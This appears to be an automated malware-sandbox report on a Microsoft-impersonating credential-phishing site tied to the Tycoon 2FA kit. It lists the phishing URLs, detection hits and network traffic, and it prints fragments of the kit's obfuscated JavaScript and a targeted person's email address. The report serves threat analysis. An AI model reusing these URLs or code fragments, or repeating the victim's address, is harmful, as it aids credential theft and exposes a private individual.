https://3pz.bughtswo.com/klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/zcjFjVbeWag4BIehEdWrtkCkgYwI2qGKbsfn5dGfq	true	Avira URL Cloud: phishing	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://3pz.bughtswo.com/xyI3O4tCtbzsOtrs132Ycd30	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201	true	Avira URL Cloud: phishing	unknown
https://rxivb5.qakaco.ru/phudi$g8yzhxe	false	Avira URL Cloud: safe	unknown
https://developers.cloudflare.com/favicon.png	false		high
https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	true		unknown
https://3pz.bughtswo.com/opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230	true	Avira URL Cloud: phishing	unknown
https://a.nel.cloudflare.com/report/v4?s=%2BUIoZMPRG8vNPXrCaUHRFNpOxoO0llmdTlI9mVFobnQAOUWQnaXEQlVSnhAlaQmc5PjrqdLzlhpkoxEhnWwQp8nObmN2xhfYGOFErumcN6nGbNNZXiWmUrbruaLH	false	Avira URL Cloud: safe	unknown
https://3pz.bughtswo.com/56lW6APRQ2ESm07QQ6vYBzijnmTAv3b989110	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210	true	Avira URL Cloud: phishing	unknown
https://get.geojs.io/v1/ip/geo.json	false		high
https://3pz.bughtswo.com/56usdLGyORYNk44l9ghb0mDtUEm8nDuuFwg67110	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230	true	Avira URL Cloud: phishing	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://3pz.bughtswo.com/admi/	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56mQ3hNU0OeLFsBE0cdBYhj76720	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/xyYqDiOE9Wrs7igh30	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-bold.woff	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/yfuOUwyTI9qASHIO1Yd1WuHEVWTfcFf2n32Nn6H6lWun5L5SxS2l	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-vf2.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/zcjFjVbeWag4BIehEdWrtkCkgYwI2qGKbsfn5dGfq	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-vf.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-regular.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-bold.woff2	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56usdLGyORYNk44l9ghb0mDtUEm8nDuuFwg67110	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/GDSherpa-regular.woff	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/wpE72XVhb4Z1pXQe52oRXxRmo	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/zc8QtV1AgOx9d4g80BylSMR67CLPWQsWgy	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/12cgfpYt7Gg84zxyfkj8918	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uheSegtXcJrGcg1LANWjxLwtiG1EYvEeZy6o1u9WZEqq1xsRwxhwODvkp	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/xyI3O4tCtbzsOtrs132Ycd30	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/ijoyUfMSqMcVe9WXGTZVlctVeCxOyPKKqrSkxb2xnBTPwVtirVuPyz230	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/56lW6APRQ2ESm07QQ6vYBzijnmTAv3b989110	Avira URL Cloud: Label: phishing
Source: https://3pz.bughtswo.com/efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150	Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '3pz.bughtswo.com' does not match the legitimate domain 'microsoft.com'., The domain 'bughtswo.com' is not associated with Microsoft and appears suspicious., The subdomain '3pz' does not provide any indication of legitimacy and is likely used to obfuscate the true nature of the site., The email domain 'wilsonsadvisory.com.au' does not match the brand 'Microsoft', which raises further suspicion. DOM: 1.3.pages.csv
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The URL '3pz.bughtswo.com' does not match the legitimate domain for Microsoft., The domain 'bughtswo.com' is not associated with Microsoft and appears suspicious., The use of a subdomain '3pz' and an unrelated main domain suggests a phishing attempt., The input fields 'Email, phone, or Skype' are commonly targeted in phishing attacks. DOM: 3.9.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

Yara detected Invisible JS

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 2.23.d.script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML

Yara detected Obfuscation Via HangulCharacter

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 1.19..script.csv, type: HTML
Source: Yara match	File source: 2.23.d.script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 3.34..script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_109, type: DROPPED

Yara detected Tycoon 2FA PaaS

Source: Yara match	File source: 1.16.d.script.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 0.9.d.script.csv, type: HTML
Source: Yara match	File source: 0.6..script.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 1.11..script.csv, type: HTML
Source: Yara match	File source: 1.12..script.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 2.22.d.script.csv, type: HTML
Source: Yara match	File source: 2.24..script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 3.33.d.script.csv, type: HTML
Source: Yara match	File source: 3.29..script.csv, type: HTML
Source: Yara match	File source: 2.27.d.script.csv, type: HTML
Source: Yara match	File source: 3.30..script.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.9.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including disabling common keyboard shortcuts and context menus, as well as using a debugger trap to detect and redirect the user to an external domain. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from accessing the original content or redirecting them to a malicious site.
Source: 0.2.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including disabling common debugging and developer tools, blocking keyboard shortcuts, and redirecting the user to an external website. The combination of these behaviors suggests a highly suspicious and potentially malicious script.
Source: 0.8..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://3pz.bughtswo.com/admi/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger-related function suggest malicious intent. Additionally, the script appears to be checking for the presence of web driver or headless browser environments, which is a common technique used by malware to detect and evade analysis. Overall, this script poses a significant security risk and should be treated with caution.
Source: 0.1.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution using `eval()` and potential data exfiltration. The obfuscated code and use of proxy objects further increase the risk. Overall, this script exhibits a high level of suspicious activity and should be thoroughly investigated.
Source: 0.0..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://3pz.bughtswo.com/admi/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain (`zAz.bughtswo.com/admin`), which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.

Detected javascript redirector / loader

Source: suspect.html

HTTP Parser: Low number of body elements: 0

HTML body contains low number of good links

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Number of links: 0
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: <input type="password" .../> found but no <form action="...

HTML page contains hidden javascript code

Source: suspect.html

HTTP Parser: Base64 decoded: brad.gale@wilsonsadvisory.com.au

HTML title does not match URL

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Title: Secure Account Access does not match URL
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Title: Enter Account Security Access does not match URL

Invalid T&C link found

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Privacy & cookies
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: Invalid link: Privacy & cookies
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Invalid link: Terms of use
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: Invalid link: Privacy & cookies

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://3pz.bughtswo.com/admi/	HTTP Parser: function gkmzlkxemo(){ysswiifynp = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+t2zmawnlidm2nsbeb2n1bwvudgf0aw9upc90axrszt4kicagidxzdhlszt4kicagicagicbib2r5ihskicagicagicagicagzm9udc1myw1pbhk6iefyawfslcbzyw5zlxnlcmlmowogicagicagicagicbsaw5llwhlawdoddogms42owogicagicagicagicbtyxjnaw46idiwchg7ciagicagicagfqogicagicagiggxlcbomib7ciagicagicagicagignvbg9yoiajmky1ndk2owogicagicagih0kicagicagicb1bcb7ciagicagicagicagigxpc3qtc3r5bgutdhlwztogc3f1yxjlowogicagicagih0kicagicagicbhihskicagicagicagicagy29sb3i6icmwmdc4rdq7ciagicagicagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagicb9ciagicagicagytpob3zlcib7ciagicagicagicagihrlehqtzgvjb3jhdglvbjogdw5kzxjsaw5lowogicagicagih0kicagidwvc3r5bgu+cjwvagvhzd4kpgjvzhk+ciagica8ade+r2v0dgluzybtdgfydgvkihdpdgggt2zmawnlidm2ntwvade+ciagica8cd5pzmzpy2ugmzy1iglzigegy2xvdwqtymfzzwqgc3vpdgugb2ygchjvzhvjdgl2axr5ihrvb2xzigrlc2lnbmvki...
Source: anonymous function	HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "r4nft8";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/uhesegtxcjrgcg1lanwjxlwtig1eyveezy6o1u9wzeqq1xsrwxhwodvkp";var gdf = "/ghantxvapyniqs6cbwxo4kufdzl3i1xkcd116";var odf = "/gh4fj2hln9uw3vpfmyzdf0kbvfvrkdmnbab650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)){ browsern...

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: <input type="password" .../> found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: <input type="password" .../> found

Source: suspect.html	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No favicon
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No favicon

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="author".. found
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="author".. found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No <meta name="author".. found

Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="copyright".. found
Source: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH	HTTP Parser: No <meta name="copyright".. found
Source: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.69:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.122:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 1.1.1.1:53

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.195
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

